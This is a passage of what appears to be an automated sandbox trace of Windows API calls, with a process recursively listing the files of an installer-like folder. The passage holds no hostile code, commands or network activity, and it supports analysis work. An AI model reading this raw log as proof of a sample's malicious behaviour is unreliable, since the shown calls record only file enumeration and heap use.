cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.800] FindClose (in: hFindFile=0x677bb0 | out: hFindFile=0x677bb0) returned 1 [0158.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.800] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3076", cAlternateFileName="")) returned 1 [0158.800] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.800] lstrlenW (lpString="3076") returned 4 [0158.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677eb0 [0158.801] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.801] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.801] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.801] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.801] lstrlenW (lpString="eula.rtf") returned 8 [0158.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a2888 [0158.801] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.801] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.801] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a15f8 [0158.801] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.801] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.801] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.802] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.802] FindClose (in: hFindFile=0x677eb0 | out: hFindFile=0x677eb0) returned 1 [0158.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.802] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0158.802] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.802] lstrlenW (lpString="3082") returned 4 [0158.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677b30 [0158.803] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.804] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.804] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.804] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.804] lstrlenW (lpString="eula.rtf") returned 8 [0158.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a29d8 [0158.804] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.804] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.804] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a1b38 [0158.804] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.804] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.804] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.804] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.805] FindClose (in: hFindFile=0x677b30 | out: hFindFile=0x677b30) returned 1 [0158.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.816] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 1 [0158.816] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.816] lstrlenW (lpString="Client") returned 6 [0158.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677cf0 [0158.817] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.817] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.817] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0158.817] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.817] lstrlenW (lpString="Parameterinfo.xml") returned 17 [0158.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb6) returned 0x6a1778 [0158.818] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0158.818] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.818] lstrlenW (lpString="UiInfo.xml") returned 10 [0158.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa8) returned 0x66e0b0 [0158.818] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0158.818] FindClose (in: hFindFile=0x677cf0 | out: hFindFile=0x677cf0) returned 1 [0158.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.818] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x0, dwReserved1=0x0, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0158.818] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.818] lstrlenW (lpString="DHtmlHeader.html") returned 16 [0158.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x66e370 [0158.819] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0158.819] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.819] lstrlenW (lpString="DisplayIcon.ico") returned 15 [0158.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa4) returned 0x66e630 [0158.819] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extended", cAlternateFileName="")) returned 1 [0158.819] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.819] lstrlenW (lpString="Extended") returned 8 [0158.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677eb0 [0158.820] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.820] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.820] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0158.820] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.820] lstrlenW (lpString="Parameterinfo.xml") returned 17 [0158.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xba) returned 0x6a0720 [0158.820] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0158.820] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.820] lstrlenW (lpString="UiInfo.xml") returned 10 [0158.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xac) returned 0x6a07e8 [0158.820] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0158.820] FindClose (in: hFindFile=0x677eb0 | out: hFindFile=0x677eb0) returned 1 [0158.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.821] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Graphics", cAlternateFileName="")) returned 1 [0158.821] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.821] lstrlenW (lpString="Graphics") returned 8 [0158.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677eb0 [0158.823] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.823] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.823] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0158.823] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.823] lstrlenW (lpString="Print.ico") returned 9 [0158.823] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xaa) returned 0x6a3670 [0158.824] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0158.824] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.824] lstrlenW (lpString="Rotate1.ico") returned 11 [0158.824] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xae) returned 0x6a3728 [0158.824] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0158.824] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.824] lstrlenW (lpString="Rotate2.ico") returned 11 [0158.824] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xae) returned 0x6a37e0 [0158.824] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0158.824] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.824] lstrlenW (lpString="Rotate3.ico") returned 11 [0158.824] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xae) returned 0x6a3898 [0158.824] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate4.ico", cAlternateFileName="")) 